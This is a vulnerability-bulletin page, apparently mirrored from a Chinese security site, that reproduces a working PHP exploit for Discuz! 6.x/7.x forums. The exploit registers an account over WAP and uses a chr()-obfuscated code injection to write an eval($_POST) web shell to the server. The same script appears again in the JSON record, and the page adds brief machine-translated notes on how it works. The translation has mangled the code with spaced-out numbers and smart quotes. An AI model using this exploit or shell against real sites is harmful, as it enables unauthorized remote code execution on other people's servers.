Search...

DZ! sodb-2 0 0 8-1 3 EXP published-vulnerability warning-the black bar safety net

2008-11-17T00:00:00

ID MYHACK58:62200821107
Type myhack58
Reporter 佚名
Modified 2008-11-17T00:00:00

Description

!/ usr/bin/php

<? php /* * Discuz! 6. x/7. x SODB-2 0 0 8-1 3 Exp * By www.80vul.com * Notes the value of the variable, add your own modifications / $host = ‘www.80vul.com’; // Server domain or IP $path = ‘/discuz/’; // Where the program path $key = 0; // The above variable is edited, make will the value here to 1

if (strpos($host, ‘://’) !== false || strpos($path, ‘/’) === false || $key !== 1) exit(”a professional point well,the first look inside the comments -,-\n”);

error_reporting(7); ini_set(’max_execution_time’, 0);

$key = time(); $cmd = ‘action=register&username=’.$ key.’& amp;password=’.$ key.’& amp;email=’.$ key.’@ 80vul. com&_DCACHE=1'; $resp = send();

preg_match(’/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/’, $resp, $sid);

if (!$ sid) exit(”Oh,is probably not turned on the WAP registration. -,- \n”);

$cmd = ’stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid=’.$ sid[1].’& amp;creditsformula=${${fputs(fopen(chr(4 6). chr(4 6). chr(4 7). chr(1 0 2). chr(1 1 1). chr(1 1 4). chr(1 1 7). chr(1 0 9). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2),chr(1 1 9). chr(4 3)),chr(6 0). chr(6 3). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(9 9). chr(9 3). chr(4 1). chr(6 3). chr(6 2). chr(5 6). chr(4 8). chr(1 1 8). chr(1 1 7). chr(1 0 8))}}’; send();

$shell = ‘http://’.$ host.$ path.’forumdata/cache/eval.php’;

if (file_get_contents($shell) == ‘80vul’) exit(”well,go and see your WebShell.:\t$shell\n inside the code is:\t<? eval(\$_POST[c])?& gt;\n don't tell me you don't use -,-\n”); else exit(”well,is probably the site does not exist vulnerability,for one. -,- \n”);

function send() { global $host, $path, $url, $cmd;

$data = “POST “.$ path.”wap/index.php HTTP/1.1\r\n”; $data .= “Accept: /\r\n”; $data .= “Accept-Language: zh-cn\r\n”; $data .= “Referer: http://$host$path\r\n”; $data .= “Content-Type: application/x-www-form-urlencoded\r\n”; $data .= “User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n”; $data .= “Host: $host\r\n”; $data .= “Connection: Close\r\n”; $data .= “Content-Length: “. strlen($cmd).”\ r\n\r\n”; $data .= $cmd;

$fp = fsockopen($host, 8 0); fputs($fp, $data);

$resp = ”;

while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; }

?& gt;

Very strong a hole,I refers to the vulnerability of the formation of reason...the specific use of the efficiency of what not to say,of the wap to turn on：）

DZ! sodb-2 0 0 8-1 3 EXP small mind

fopen(../forumdata/cache/eval.php,w+,<? eval($_POST[c])?& gt;80vul) Wscript. echo chr(xx)followed by more time with&connection.

file_get_contents function reads the contents of the file. (Display it on the page..not the source code) To determine whether the 80vul,there is success now!

JSON Vulners Source

Initial Source

{"type": "myhack58", "edition": 1, "title": "DZ! sodb-2 0 0 8-1 3 EXP published-vulnerability warning-the black bar safety net", "references": [], "bulletinFamily": "info", "published": "2008-11-17T00:00:00", "lastseen": "2016-11-15T18:10:00", "modified": "2008-11-17T00:00:00", "reporter": "\u4f5a\u540d", "viewCount": 0, "href": "http://www.myhack58.com/Article/html/3/62/2008/21107.htm", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-15T18:10:00", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-15T18:10:00", "rev": 2}, "vulnersScore": -0.2}, "cvelist": [], "id": "MYHACK58:62200821107", "description": "#!/ usr/bin/php \n<? php \n/** \n* Discuz! 6. x/7. x SODB-2 0 0 8-1 3 Exp \n* By [www.80vul.com](<http://www.80vul.com/>) \n* Notes the value of the variable, add your own modifications \n*/ \n$host = \u2018[www.80vul.com](<http://www.80vul.com/>)\u2019; \n// Server domain or IP \n$path = \u2018/discuz/\u2019; \n// Where the program path \n$key = 0; \n// The above variable is edited, make will the value here to 1 \n\nif (strpos($host, \u2018://\u2019) !== false || strpos($path, \u2018/\u2019) === false || $key !== 1) \nexit(\u201da professional point well,the first look inside the comments -,-\\n\u201d); \n\nerror_reporting(7); \nini_set(\u2019max_execution_time\u2019, 0); \n\n$key = time(); \n$cmd = \u2018action=register&username=\u2019.$ key.\u2019& amp;password=\u2019.$ key.\u2019& amp;email=\u2019.$ key.\u2019@ 80vul. com&_DCACHE=1'; \n$resp = send(); \n\npreg_match(\u2019/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/\u2019, $resp, $sid); \n\nif (!$ sid) \nexit(\u201dOh,is probably not turned on the WAP registration. -,- \\n\u201d); \n\n$cmd = \u2019stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid=\u2019.$ sid[1].\u2019& amp;creditsformula=${${fputs(fopen(chr(4 6). chr(4 6). chr(4 7). chr(1 0 2). chr(1 1 1). chr(1 1 4). chr(1 1 7). chr(1 0 9). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2),chr(1 1 9). chr(4 3)),chr(6 0). chr(6 3). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(9 9). chr(9 3). chr(4 1). chr(6 3). chr(6 2). chr(5 6). chr(4 8). chr(1 1 8). chr(1 1 7). chr(1 0 8))}}\u2019; \nsend(); \n\n$shell = \u2018http://\u2019.$ host.$ path.\u2019forumdata/cache/eval.php\u2019; \n\nif (file_get_contents($shell) == \u201880vul\u2019) \nexit(\u201dwell,go and see your WebShell.:\\t$shell\\n inside the code is:\\t<? eval(\\$_POST[c])?& gt;\\n don't tell me you don't use -,-\\n\u201d); \nelse \nexit(\u201dwell,is probably the site does not exist vulnerability,for one. -,- \\n\u201d); \n\nfunction send() \n{ \nglobal $host, $path, $url, $cmd; \n\n$data = \u201cPOST \u201c.$ path.\u201dwap/index.php HTTP/1.1\\r\\n\u201d; \n$data .= \u201cAccept: */*\\r\\n\u201d; \n$data .= \u201cAccept-Language: zh-cn\\r\\n\u201d; \n$data .= \u201cReferer: [http://$host$path](<http://$host$path/>)\\r\\n\u201d; \n$data .= \u201cContent-Type: application/x-www-form-urlencoded\\r\\n\u201d; \n$data .= \u201cUser-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\\r\\n\u201d; \n$data .= \u201cHost: $host\\r\\n\u201d; \n$data .= \u201cConnection: Close\\r\\n\u201d; \n$data .= \u201cContent-Length: \u201c. strlen($cmd).\u201d\\ r\\n\\r\\n\u201d; \n$data .= $cmd; \n\n$fp = fsockopen($host, 8 0); \nfputs($fp, $data); \n\n$resp = \u201d; \n\nwhile ($fp && ! feof($fp)) \n$resp .= fread($fp, 1 0 2 4); \n\nreturn $resp; \n} \n\n?& gt; \n\nVery strong a hole,I refers to the vulnerability of the formation of reason...the specific use of the efficiency of what not to say,of the wap to turn on\uff1a\uff09 \n\n\nDZ! sodb-2 0 0 8-1 3 EXP small mind \n\nfopen(../forumdata/cache/eval.php,w+,<? eval($_POST[c])?& gt;80vul) \nWscript. echo chr(xx)followed by more time with&connection. \n\nfile_get_contents function reads the contents of the file. (Display it on the page..not the source code) \nTo determine whether the 80vul,there is success now! \n\n"}